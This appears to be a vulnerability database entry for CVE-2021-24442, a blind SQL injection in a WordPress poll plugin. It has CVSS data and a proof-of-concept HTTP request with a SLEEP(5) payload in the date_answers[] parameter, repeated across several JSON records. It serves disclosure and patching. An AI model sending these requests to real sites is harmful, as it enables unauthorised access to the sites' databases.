Description
The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
### PoC
v < 1.5.3 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done] Cookie: [any user, authenticated or not] Connection: close question_id=1&poll;_answer_securety=1c6ab7113b&date;_answers%5B0%5D=SLEEP(5) v < 1.5.1 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Cookie: [any user, authenticated or not] Connection: close question_id=1&poll;_answer_securety=1c6ab7113b&date;_answers%5B0%5D=SLEEP(5)
Affected Software
Related
{"id": "WPVDB-ID:7376666E-9B2A-4239-B11F-8544435B444A", "type": "wpvulndb", "bulletinFamily": "software", "title": "Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection", "description": "The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n\n### PoC\n\nv < 1.5.3 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done] Cookie: [any user, authenticated or not] Connection: close question_id=1&poll;_answer_securety=1c6ab7113b&date;_answers%5B0%5D=SLEEP(5) v < 1.5.1 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Cookie: [any user, authenticated or not] Connection: close question_id=1&poll;_answer_securety=1c6ab7113b&date;_answers%5B0%5D=SLEEP(5) \n", "published": "2021-06-22T00:00:00", "modified": "2021-06-22T14:55:51", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a", "reporter": "Toby Jackson", "references": ["https://www.in-spired.xyz/wpdevart-polls-blind-sql-injection/"], "cvelist": ["CVE-2021-24442"], "immutableFields": [], "lastseen": "2021-09-14T23:16:39", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24442"]}, {"type": "patchstack", "idList": ["PATCHSTACK:F33705EDD93A27DFFE5EF26C153B3EF6"]}, {"type": "wpexploit", "idList": ["WPEX-ID:7376666E-9B2A-4239-B11F-8544435B444A"]}]}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24442"]}, {"type": "wpexploit", "idList": ["WPEX-ID:7376666E-9B2A-4239-B11F-8544435B444A"]}]}, "exploitation": null, "vulnersScore": 0.6}, "affectedSoftware": [{"version": "1.5.3", "operator": "lt", "name": "polls-widget"}], "exploit": "v < 1.5.3\r\n\r\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 74\r\nX-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done]\r\nCookie: [any user, authenticated or not]\r\nConnection: close\r\n\r\nquestion_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)\r\n\r\nv < 1.5.1\r\n\r\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 74\r\nCookie: [any user, authenticated or not]\r\nConnection: close\r\n\r\nquestion_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)\r\n\r\n", "sourceData": "", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1660007784}, "_internal": {"score_hash": "32b709d5e506caa886e076753e323acc"}}
{"cve": [{"lastseen": "2022-03-23T14:54:45", "description": "The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T20:15:00", "type": "cve", "title": "CVE-2021-24442", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24442"], "modified": "2021-07-15T15:35:00", "cpe": [], "id": "CVE-2021-24442", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24442", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:31:48", "description": "Unauthenticated Blind SQL Injection (SQLi) vulnerability discovered by Toby Jackson in WordPress Polls Widget plugin (versions <= 1.5.2).\n\n## Solution\n\n\r\n Update the WordPress Polls Widget plugin to the latest available version (at least 1.5.3).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-22T00:00:00", "type": "patchstack", "title": "WordPress Polls Widget plugin <= 1.5.2 - Unauthenticated Blind SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24442"], "modified": "2021-06-22T00:00:00", "id": "PATCHSTACK:F33705EDD93A27DFFE5EF26C153B3EF6", "href": "https://patchstack.com/database/vulnerability/polls-widget/wordpress-polls-widget-plugin-1-5-2-unauthenticated-blind-sql-injection-sqli-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-09-14T23:16:39", "description": "The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-22T00:00:00", "type": "wpexploit", "title": "Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24442"], "modified": "2021-06-22T14:55:51", "id": "WPEX-ID:7376666E-9B2A-4239-B11F-8544435B444A", "href": "", "sourceData": "v < 1.5.3\r\n\r\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 74\r\nX-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done]\r\nCookie: [any user, authenticated or not]\r\nConnection: close\r\n\r\nquestion_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)\r\n\r\nv < 1.5.1\r\n\r\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 74\r\nCookie: [any user, authenticated or not]\r\nConnection: close\r\n\r\nquestion_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection
